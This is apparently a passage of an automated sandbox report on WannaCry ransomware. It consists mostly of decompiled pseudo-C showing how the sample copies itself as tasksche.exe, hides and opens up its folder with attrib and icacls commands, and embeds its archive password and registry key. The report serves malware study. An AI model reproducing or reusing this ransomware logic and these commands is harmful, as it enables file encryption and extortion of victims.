											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}
0x00407136
0x00407136
0x00407140
0x00407148
0x0040714a
0x00407168
0x0040716b
0x0040716e
0x00407170
0x004071b7
0x004071c8
0x004071cd
0x004071cf
0x004071d3
0x004071d8
0x004071d8
0x004071d8
                                                                                                                                                0x004071dc
                                                                                                                                                0x004071dd
                                                                                                                                                0x004071e1
                                                                                                                                                0x004071ea
                                                                                                                                                0x004071ec
                                                                                                                                                0x004071fa
                                                                                                                                                0x00000000
                                                                                                                                                0x00407206
                                                                                                                                                0x00000000
                                                                                                                                                0x004071e3
                                                                                                                                                0x004071e3
                                                                                                                                                0x00000000
                                                                                                                                                0x004071e3
                                                                                                                                                0x004071e1
                                                                                                                                                0x00407172
                                                                                                                                                0x00407175
                                                                                                                                                0x00407179
                                                                                                                                                0x0040717e
                                                                                                                                                0x0040717e
                                                                                                                                                0x0040717f
                                                                                                                                                0x00407181
                                                                                                                                                0x00407185
                                                                                                                                                0x00407188
                                                                                                                                                0x0040715e
                                                                                                                                                0x00000000
                                                                                                                                                0x0040718a
                                                                                                                                                0x0040718a
                                                                                                                                                0x0040718d
                                                                                                                                                0x00407196
                                                                                                                                                0x00407196
                                                                                                                                                0x00407198
                                                                                                                                                0x0040719b
                                                                                                                                                0x004071ad
                                                                                                                                                0x004071b3
                                                                                                                                                0x004071b6
                                                                                                                                                0x00000000
                                                                                                                                                0x004071b6
                                                                                                                                                0x0040719e
                                                                                                                                                0x00407195
                                                                                                                                                0x00000000
                                                                                                                                                0x00407195
                                                                                                                                                0x00407190
                                                                                                                                                0x00000000
                                                                                                                                                0x00407190
                                                                                                                                                0x00407188
                                                                                                                                                0x0040714f
                                                                                                                                                0x00407210
                                                                                                                                                0x00407214
                                                                                                                                                0x00407218
                                                                                                                                                0x0040721d
                                                                                                                                                0x0040721d
                                                                                                                                                0x0040721e
                                                                                                                                                0x00407220
                                                                                                                                                0x00407223
                                                                                                                                                0x00407227
                                                                                                                                                0x0040722a
                                                                                                                                                0x00000000
                                                                                                                                                0x00407230
                                                                                                                                                0x00407230
                                                                                                                                                0x00407233
                                                                                                                                                0x0040723c
                                                                                                                                                0x0040723c
                                                                                                                                                0x0040723e
                                                                                                                                                0x00407241
                                                                                                                                                0x00407255
                                                                                                                                                0x0040725a
                                                                                                                                                0x00407261
                                                                                                                                                0x0040729c
                                                                                                                                                0x0040729f
                                                                                                                                                0x004072a9
                                                                                                                                                0x004072ac
                                                                                                                                                0x004072ae
                                                                                                                                                0x004072b0
                                                                                                                                                0x004072b2
                                                                                                                                                0x004072b2
                                                                                                                                                0x004072b4
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004072b6
                                                                                                                                                0x004072b8
                                                                                                                                                0x004072be
                                                                                                                                                0x004072be
                                                                                                                                                0x004072c1
                                                                                                                                                0x004072c1
                                                                                                                                                0x004072c4
                                                                                                                                                0x00000000
                                                                                                                                                0x004072c4
                                                                                                                                                0x004072ba
                                                                                                                                                0x004072bc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004072bc
                                                                                                                                                0x004072cf
                                                                                                                                                0x004072d5
                                                                                                                                                0x004072d8
                                                                                                                                                0x00407347
                                                                                                                                                0x0040734f
                                                                                                                                                0x00407356
                                                                                                                                                0x0040737b
                                                                                                                                                0x0040738f
                                                                                                                                                0x0040739e
                                                                                                                                                0x004073a3
                                                                                                                                                0x00407312
                                                                                                                                                0x00407312
                                                                                                                                                0x0040732b
                                                                                                                                                0x00407331
                                                                                                                                                0x00407331
                                                                                                                                                0x00407334
                                                                                                                                                0x00407337
                                                                                                                                                0x004073b3
                                                                                                                                                0x004073b8
                                                                                                                                                0x004073c0
                                                                                                                                                0x004073c6
                                                                                                                                                0x004073c9
                                                                                                                                                0x004073ce
                                                                                                                                                0x004073cf
                                                                                                                                                0x004073cf
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d5
                                                                                                                                                0x004073d9
                                                                                                                                                0x004073eb
                                                                                                                                                0x004073ed
                                                                                                                                                0x004073f0
                                                                                                                                                0x004073f3
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004073f5
                                                                                                                                                0x004073f7
                                                                                                                                                0x0040742a
                                                                                                                                                0x0040742a
                                                                                                                                                0x0040745a
                                                                                                                                                0x0040745a
                                                                                                                                                0x0040745e
                                                                                                                                                0x00407463
                                                                                                                                                0x00407463
                                                                                                                                                0x0040746b
                                                                                                                                                0x00000000
                                                                                                                                                0x00407473
                                                                                                                                                0x004073f9
                                                                                                                                                0x00407415
                                                                                                                                                0x00407415
                                                                                                                                                0x00407419
                                                                                                                                                0x00407454
                                                                                                                                                0x00000000
                                                                                                                                                0x00407454
                                                                                                                                                0x0040741b
                                                                                                                                                0x0040741d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040741f
                                                                                                                                                0x0040740b
                                                                                                                                                0x00407411
                                                                                                                                                0x00407413
                                                                                                                                                0x00407433
                                                                                                                                                0x00000000
                                                                                                                                                0x00407433
                                                                                                                                                0x00000000
                                                                                                                                                0x00407413
                                                                                                                                                0x00407421
                                                                                                                                                0x00000000
                                                                                                                                                0x00407421
                                                                                                                                                0x00000000
                                                                                                                                                0x00407339
                                                                                                                                                0x00407358
                                                                                                                                                0x0040735f
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00407361
                                                                                                                                                0x00407368
                                                                                                                                                0x004072e1
                                                                                                                                                0x004072e7
                                                                                                                                                0x004072fc
                                                                                                                                                0x0040730a
                                                                                                                                                0x0040730f
                                                                                                                                                0x00000000
                                                                                                                                                0x0040730f
                                                                                                                                                0x0040736e
                                                                                                                                                0x00407375

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: %s%s$%s%s%s$:$\
                                                                                                                                                • API String ID: 0-1100577047
                                                                                                                                                • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                                                                                • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                                                                                                                                                • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                                                                                                                                                • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E0040203B(intOrPtr* __eax, void* __edi) {
                                                                                                                                                				void* _t25;
                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                				int _t42;
                                                                                                                                                				CHAR* _t63;
                                                                                                                                                				void* _t64;
                                                                                                                                                				char** _t66;
                                                                                                                                                
                                                                                                                                                				__imp____p___argv();
                                                                                                                                                				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
                                                                                                                                                					L4:
                                                                                                                                                					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
                                                                                                                                                						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
                                                                                                                                                					}
                                                                                                                                                					SetCurrentDirectoryA(_t64 - 0x20c);
                                                                                                                                                					E004010FD(1);
                                                                                                                                                					 *_t66 = "WNcry@2ol7";
                                                                                                                                                					_push(_t42);
                                                                                                                                                					L00401DAB();
                                                                                                                                                					E00401E9E();
                                                                                                                                                					E00401064("attrib +h .", _t42, _t42);
                                                                                                                                                					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
                                                                                                                                                					_t25 = E0040170A();
                                                                                                                                                					_t74 = _t25;
                                                                                                                                                					if(_t25 != 0) {
                                                                                                                                                						E004012FD(_t64 - 0x6e4, _t74);
                                                                                                                                                						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
                                                                                                                                                							 *(_t64 - 4) = _t42;
                                                                                                                                                							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
                                                                                                                                                								_t33 = E00402924(_t32, "TaskStart");
                                                                                                                                                								_t78 = _t33 - _t42;
                                                                                                                                                								if(_t33 != _t42) {
                                                                                                                                                									 *_t33(_t42, _t42);
                                                                                                                                                								}
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						E0040137A(_t64 - 0x6e4, _t78);
                                                                                                                                                					}
                                                                                                                                                					goto L13;
                                                                                                                                                				} else {
                                                                                                                                                					_t63 = "tasksche.exe";
                                                                                                                                                					CopyFileA(_t64 - 0x20c, _t63, _t42);
                                                                                                                                                					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
                                                                                                                                                						goto L4;
                                                                                                                                                					} else {
                                                                                                                                                						L13:
                                                                                                                                                						return 0;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • __p___argv.MSVCRT(0040F538), ref: 00402040
                                                                                                                                                • strcmp.MSVCRT(?), ref: 0040204B
                                                                                                                                                • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                                                                                                                                                • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                                                                                                                                                  • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                                                                                                                                                • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                                                                                                                                                • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                                                                                                                                                  • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                                                                                  • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                                                                                  • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                                                                                  • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                                                                                                                                                • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                                                                                                                                                • API String ID: 1074704982-2844324180
                                                                                                                                                • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                                                                                • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                                                                                                                                                • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                                                                                                                                                • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                			E004010FD(intOrPtr _a4) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				int _v16;
                                                                                                                                                				void _v196;
                                                                                                                                                				long _v216;
                                                                                                                                                				void _v735;
                                                                                                                                                				char _v736;
                                                                                                                                                				signed int _t44;
                                                                                                                                                				void* _t46;
                                                                                                                                                				signed int _t55;
                                                                                                                                                				signed int _t56;
                                                                                                                                                				char* _t72;
                                                                                                                                                				void* _t77;
                                                                                                                                                
                                                                                                                                                				_t56 = 5;
                                                                                                                                                				memcpy( &_v216, L"Software\\", _t56 << 2);
                                                                                                                                                				_push(0x2d);
                                                                                                                                                				_v736 = _v736 & 0;
                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
                                                                                                                                                				asm("stosw");
                                                                                                                                                				asm("stosb");
                                                                                                                                                				wcscat( &_v216, L"WanaCrypt0r");
                                                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                                                				_t72 = "wd";
                                                                                                                                                				do {
                                                                                                                                                					_push( &_v8);
                                                                                                                                                					_push( &_v216);
                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                						_push(0x80000001);
                                                                                                                                                					} else {
                                                                                                                                                						_push(0x80000002);
                                                                                                                                                					}
                                                                                                                                                					RegCreateKeyW();
                                                                                                                                                					if(_v8 != 0) {
                                                                                                                                                						if(_a4 == 0) {
                                                                                                                                                							_v16 = 0x207;
                                                                                                                                                							_t44 = RegQueryValueExA(_v8, _t72, 0, 0,  &_v736,  &_v16);
                                                                                                                                                							asm("sbb esi, esi");
                                                                                                                                                							_t77 =  ~_t44 + 1;
                                                                                                                                                							if(_t77 != 0) {
                                                                                                                                                								SetCurrentDirectoryA( &_v736);
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							GetCurrentDirectoryA(0x207,  &_v736);
                                                                                                                                                							_t55 = RegSetValueExA(_v8, _t72, 0, 1,  &_v736, strlen( &_v736) + 1);
                                                                                                                                                							asm("sbb esi, esi");
                                                                                                                                                							_t77 =  ~_t55 + 1;
                                                                                                                                                						}
                                                                                                                                                						RegCloseKey(_v8);
                                                                                                                                                						if(_t77 != 0) {
                                                                                                                                                							_t46 = 1;
                                                                                                                                                							return _t46;
                                                                                                                                                						} else {
                                                                                                                                                							goto L10;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					L10:
                                                                                                                                                					_v12 = _v12 + 1;
                                                                                                                                                				} while (_v12 < 2);
                                                                                                                                                				return 0;
                                                                                                                                                			}

Instruction addresses (one per C-code line above): 0x0040110f, 0x00401116, 0x00401118, 0x0040111c, 0x00401129, 0x0040113a, 0x0040113c, 0x0040113e, 0x0040114b, 0x00401151, 0x00401157, 0x0040115c, 0x00401164, 0x0040116b, 0x0040116c, 0x00401175, 0x0040116e, 0x0040116e, 0x0040116e, 0x0040117a, 0x00401183, 0x0040118c, 0x004011cf, 0x004011e4, 0x004011ee, 0x004011f0, 0x004011f1, 0x004011fa, 0x004011fa, 0x0040118e, 0x0040119a, 0x004011bd, 0x004011c7, 0x004011c9, 0x004011c9, 0x00401203, 0x0040120b, 0x00401222, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0040120b, 0x0040120d, 0x0040120d, 0x00401210, 0x00000000

                                                                                                                                                APIs
                                                                                                                                                • wcscat.MSVCRT(?,WanaCrypt0r,?,0000DDB6), ref: 0040114B
                                                                                                                                                • RegCreateKeyW.ADVAPI32(80000001,?,00000000), ref: 0040117A
                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 0040119A
                                                                                                                                                • strlen.MSVCRT(?), ref: 004011A7
                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,0040E030,00000000,00000001,?,00000001), ref: 004011BD
                                                                                                                                                • RegQueryValueExA.ADVAPI32(00000000,0040E030,00000000,00000000,?,?), ref: 004011E4
                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 004011FA
                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00401203
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CurrentDirectoryValue$CloseCreateQuerystrlenwcscat
                                                                                                                                                • String ID: 0@$Software\$WanaCrypt0r
                                                                                                                                                • API String ID: 865909632-3421300005
                                                                                                                                                • Opcode ID: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                                                                                • Instruction ID: 752dd9e6153134350df00ddc45e524be7a8e60cbe47ba2191db59f61a0b32c4f
                                                                                                                                                • Opcode Fuzzy Hash: be197859f140e0a5161343930b87c84f9738d6a9d10ac2d583ef225433aeadb0
                                                                                                                                                • Instruction Fuzzy Hash: 09316232801228EBDB218B90DD09BDEBB78EB44751F1140BBE645F6190CB745E84CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E00401B5F(intOrPtr _a4) {
                                                                                                                                                				void _v202;
                                                                                                                                                				short _v204;
                                                                                                                                                				void _v722;
                                                                                                                                                				long _v724;
                                                                                                                                                				signed short _v1240;
                                                                                                                                                				void _v1242;
                                                                                                                                                				long _v1244;
                                                                                                                                                				void* _t55;
                                                                                                                                                				signed int _t65;
                                                                                                                                                				void* _t72;
                                                                                                                                                				long _t83;
                                                                                                                                                				void* _t94;
                                                                                                                                                				void* _t98;
                                                                                                                                                
                                                                                                                                                				_t83 =  *0x40f874; // 0x0
                                                                                                                                                				_v1244 = _t83;
                                                                                                                                                				memset( &_v1242, 0, 0x81 << 2);
                                                                                                                                                				asm("stosw");
                                                                                                                                                				_v724 = _t83;
                                                                                                                                                				memset( &_v722, 0, 0x81 << 2);
                                                                                                                                                				asm("stosw");
                                                                                                                                                				_push(0x31);
                                                                                                                                                				_v204 = _t83;
                                                                                                                                                				memset( &_v202, 0, 0 << 2);
                                                                                                                                                				asm("stosw");
                                                                                                                                                				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
                                                                                                                                                				GetWindowsDirectoryW( &_v1244, 0x104);
                                                                                                                                                				_v1240 = _v1240 & 0x00000000;
                                                                                                                                                				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
                                                                                                                                                				_t98 = _t94 + 0x30;
                                                                                                                                                				if(GetFileAttributesW( &_v724) == 0xffffffff) {
                                                                                                                                                					L3:
                                                                                                                                                					swprintf( &_v724, L"%s\\Intel",  &_v1244);
                                                                                                                                                					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
                                                                                                                                                						L2:
                                                                                                                                                						_t55 = 1;
                                                                                                                                                						return _t55;
                                                                                                                                                					} else {
                                                                                                                                                						GetTempPathW(0x104,  &_v724);
                                                                                                                                                						if(wcsrchr( &_v724, 0x5c) != 0) {
                                                                                                                                                							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
                                                                                                                                                						}
                                                                                                                                                						_t65 = E00401AF6( &_v724,  &_v204, _a4);
                                                                                                                                                						asm("sbb eax, eax");
                                                                                                                                                						return  ~( ~_t65);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t72 = E00401AF6( &_v724,  &_v204, _a4);
                                                                                                                                                				_t98 = _t98 + 0xc;
                                                                                                                                                				if(_t72 == 0) {
                                                                                                                                                					goto L3;
                                                                                                                                                				}
                                                                                                                                                				goto L2;
                                                                                                                                                				}


                                                                                                                                                APIs
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                                                                                • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                                                                                • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                                                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                                                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                                                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000001F.00000002.345495492.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000001F.00000002.345455473.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345530956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345559637.000000000040E000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                • Associated: 0000001F.00000002.345576551.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_31_2_400000_tasksche.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                                                                                                                • String ID: %s\Intel$%s\ProgramData
                                                                                                                                                • API String ID: 3806094219-198707228
                                                                                                                                                • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                                                                                • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                                                                                                                • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                                                                                • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				char _v44;
                                                                                                                                                				void* _t82;
                                                                                                                                                				struct HINSTANCE__* _t83;
                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                				intOrPtr _t89;
                                                                                                                                                				void* _t91;
                                                                                                                                                				void* _t104;
                                                                                                                                                				void _t107;
                                                                                                                                                				intOrPtr _t116;
                                                                                                                                                				intOrPtr _t124;
                                                                                                                                                				signed int _t125;
                                                                                                                                                				signed char _t126;
                                                                                                                                                				intOrPtr _t127;
                                                                                                                                                				signed int _t134;
                                                                                                                                                				intOrPtr* _t145;
                                                                                                                                                				signed int _t146;
                                                                                                                                                				intOrPtr* _t151;
                                                                                                                                                				intOrPtr _t152;
                                                                                                                                                				short* _t153;
                                                                                                                                                				signed int _t155;
                                                                                                                                                				void* _t156;
                                                                                                                                                				intOrPtr _t157;
                                                                                                                                                				void* _t158;
                                                                                                                                                				void* _t159;
                                                                                                                                                				void* _t160;
                                                                                                                                                
                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                				_t3 =  &_a8; // 0x40213f
                                                                                                                                                				if(E00402457( *_t3, 0x40) == 0) {
                                                                                                                                                					L37:
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                				_t153 = _a4;
                                                                                                                                                				if( *_t153 == 0x5a4d) {
                                                                                                                                                					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
                                                                                                                                                						goto L37;
                                                                                                                                                					}
                                                                                                                                                					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
                                                                                                                                                					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
                                                                                                                                                						goto L2;
                                                                                                                                                					} else {
                                                                                                                                                						_t9 = _t151 + 0x38; // 0x68004021
                                                                                                                                                						_t126 =  *_t9;
                                                                                                                                                						if((_t126 & 0x00000001) != 0) {
                                                                                                                                                							goto L2;
                                                                                                                                                						}
                                                                                                                                                						_t12 = _t151 + 0x14; // 0x4080e415
                                                                                                                                                						_t13 = _t151 + 6; // 0x4080e0
                                                                                                                                                						_t146 =  *_t13 & 0x0000ffff;
                                                                                                                                                						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
                                                                                                                                                						if(_t146 <= 0) {
                                                                                                                                                							L16:
